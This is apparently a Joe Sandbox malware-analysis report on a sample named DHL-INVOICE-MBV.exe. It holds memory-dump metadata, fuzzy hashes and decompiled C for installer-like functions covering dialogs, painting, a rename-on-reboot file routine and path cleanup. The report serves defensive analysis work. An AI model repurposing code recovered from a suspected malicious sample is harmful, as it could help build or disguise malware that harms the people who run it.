Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cbc44383b8f21ea139a15c571bb0713814c536a4eb8235600bb6b5f98ec51d
Instruction ID: 832908814d267efb2524e8a94ba18221052cf97593e5762d826756d60b90fdb9
Opcode Fuzzy Hash: 95cbc44383b8f21ea139a15c571bb0713814c536a4eb8235600bb6b5f98ec51d
Instruction Fuzzy Hash: 1C51E17891438ADBEF70CE64C9D57DAB7A2BF49340FA4811ACD499B605C3306A85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03281C50 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd8c07294aefb1a5f1aadf869b91876787156b2bb3b257966e68b02154ac5a92
Instruction ID: d2c235b944deb3e8dd70dedca72e2e43371e82a366d05eb790434c14a4ee66dc
Opcode Fuzzy Hash: dd8c07294aefb1a5f1aadf869b91876787156b2bb3b257966e68b02154ac5a92
Instruction Fuzzy Hash: 0C216261659609EFCA109A148D13FC332AE9F11260F4F4111AC4EFBDD2DB2F6E494570

Uniqueness

Uniqueness Score: -1.00%

Function 03279F0F Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2302d7f5dee1c50c303cafb2bcab35ff9023305ac6acae9ab3a2aea0ce4695
Instruction ID: 809fde88b99d50e878c5cd1a33aa77e356d3ae345100f0a8c276bcec894dcaa2
Opcode Fuzzy Hash: 1b2302d7f5dee1c50c303cafb2bcab35ff9023305ac6acae9ab3a2aea0ce4695
Instruction Fuzzy Hash: A611064596C31EEED61494244AA3FE7319F1B26160F8F01259D8BF2E83FB9F9DC90162

Uniqueness

Uniqueness Score: -1.00%

Function 0327F2C2 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a4a9ac1686408b9b37b999199deb1a2a22ed51f50d1da181a7b18fee3fa744
Instruction ID: fd843e5ffb2c2d91e3c708e7a102c368b92bc027e6db0daa24d81f095d50fdde
Opcode Fuzzy Hash: d0a4a9ac1686408b9b37b999199deb1a2a22ed51f50d1da181a7b18fee3fa744
Instruction Fuzzy Hash: CB21DE3165C305EFCB28AE2189653AEBBE2EF65340F46482E9CC2DA121E33085D5CB03

Uniqueness

Uniqueness Score: -1.00%

Function 03281E1F Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a3a5481bb6ef23fbce898447ace1b3dbb0a4b1eda190127d7968ca3a6f3e49
Instruction ID: fd556ec266d951589f1ccd6339dcacfa9d09381a1f4a90bda772231fba4f9ce6
Opcode Fuzzy Hash: 57a3a5481bb6ef23fbce898447ace1b3dbb0a4b1eda190127d7968ca3a6f3e49
Instruction Fuzzy Hash: 7301D2B1B51756DFCB60EF28C922BC633F1AF253A0F464155CC89EB291E33899418680

Uniqueness

Uniqueness Score: -1.00%

Function 03291F33 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004043BA(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216b4 =  *0x4216b4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404262(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281a0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404669(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a208, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a208, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216b4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226c0; // 0x6cb6b4
						_t29 = _t69 + 0x14; // 0x6cb6c8
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040421D(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404645();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291dc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040436B;
				if(_t110 != 2) {
					_v8 = E00404331;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004041FB(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004041FB(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040421D( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404230(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a214 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216b4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216b4 = 0;
				return 0;
			}

0x004043cc
0x004044f9
0x00404556
0x0040455a
0x00404627
0x00404629
0x00404629
0x0040462f
0x0040462f
0x00404632
0x00000000
0x00404639
0x00404568
0x0040456e
0x00404578
0x00404583
0x00404586
0x00404589
0x00404594
0x00404597
0x0040459e
0x004045ab
0x004045bc
0x004045c2
0x004045ca
0x004045d8
0x004045de
0x004045de
0x0040459e
0x004045e8
0x00000000
0x004045f3
0x004045f7
0x00404607
0x00404607
0x0040460d
0x00404619
0x00404619
0x00000000
0x0040461d
0x004045e8
0x00404504
0x00000000
0x00404516
0x00404516
0x0040451b
0x0040451b
0x00404521
0x00000000
0x00000000
0x0040454a
0x0040454c
0x00404551
0x00000000
0x00404551
0x00404504
0x004043d2
0x004043d5
0x004043da
0x004043eb
0x004043eb
0x004043f3
0x004043f6
0x004043fa
0x004043fd
0x00404401
0x00404404
0x00404407
0x0040440a
0x00404411
0x00404413
0x00404413
0x0040441d
0x0040442a
0x00404434
0x00404439
0x0040443c
0x00404441
0x00404458
0x0040445f
0x00404472
0x00404475
0x00404489
0x00404490
0x00404495
0x0040449a
0x0040449a
0x004044a8
0x004044b6
0x004044c8
0x004044cd
0x004044dd
0x004044df
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
GetDlgItem.USER32(?,000003E8), ref: 0040446C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
GetSysColor.USER32(?), ref: 0040449A
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
lstrlenW.KERNEL32(?), ref: 004044BB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
GetDlgItem.USER32(?,0000040A), ref: 00404536
SendMessageW.USER32(00000000), ref: 0040453D
GetDlgItem.USER32(?,000003E8), ref: 00404568
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
SetCursor.USER32(00000000), ref: 004045BC
LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
SetCursor.USER32(00000000), ref: 004045D8
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619

Strings

1C@, xrefs: 004045C4
N, xrefs: 00404556
Call, xrefs: 00404597

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 1C@$Call$N
API String ID: 3103080414-3974410273
Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a214;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429200, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a208;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ED0(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426d88 = 0x55004e;
				 *0x426d8c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x427588, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x426988, "%ls=%ls\r\n", 0x426d88, 0x427588);
						_t53 = _t52 + 0x10;
						E004062A6(_t37, 0x400, 0x427588, 0x427588,  *((intOrPtr*)( *0x42a214 + 0x128)));
						_t12 = E00405D7A(0x427588, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DFD(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CDF(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CDF(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D35(_t24 + _t46, 0x426988, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E2C(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D7A(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426d88, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ed0
0x00405ed9
0x00405ee0
0x00405eea
0x00405efe
0x00405f26
0x00405f31
0x00405f35
0x00405f55
0x00405f5c
0x00405f66
0x00405f73
0x00405f78
0x00405f7d
0x00405f81
0x00405f90
0x00405f92
0x00405f9f
0x00405fa3
0x0040603e
0x00000000
0x00405fb9
0x00405fc6
0x00405fea
0x00405fee
0x0040600d
0x00406011
0x00406011
0x00406013
0x0040601c
0x00406027
0x00406032
0x00406038
0x00000000
0x00406038
0x00405ff0
0x00405ff3
0x00405ffe
0x00405ffa
0x00405ffc
0x00405ffd
0x00405ffd
0x00406005
0x00406007
0x00000000
0x00406007
0x00405fd1
0x00405fd7
0x00000000
0x00405fd7
0x00405fa3
0x00405f81
0x00405f00
0x00405f0b
0x00405f14
0x00405f18
0x00000000
0x00000000
0x00405f18
0x00406049

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14

Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
wsprintfA.USER32 ref: 00405F4F
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
GlobalFree.KERNEL32(00000000), ref: 00406038
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Strings

%ls=%ls, xrefs: 00405F45
[Rename], xrefs: 00405FB9, 00405FCB

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406518(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BD0(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B86(L"*?|<>/\":", _t5))) == 0) {
							E00405D35(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x0040651a
0x00406523
0x0040653a
0x0040653a
0x00406541
0x0040654d
0x0040654d
0x00406550
0x00406553
0x00406558
0x0040655a
0x00406563
0x00406567
0x00406584
0x0040658c
0x0040658c
0x00406591
0x00406593
0x00406596
0x0040659b
0x0040659c
0x004065a0
0x004065a0
0x004065a1
0x004065a8
0x004065aa
0x004065b1
0x00000000
0x00000000
0x004065b9
0x004065bf
0x00000000
0x00000000
0x00000000
0x004065bf
0x004065c4

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403334,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403334,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403334,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
*?|<>/":, xrefs: 0040656A
"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe", xrefs: 00406518

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\DHL-INVOICE-MBV.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4008409982
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68
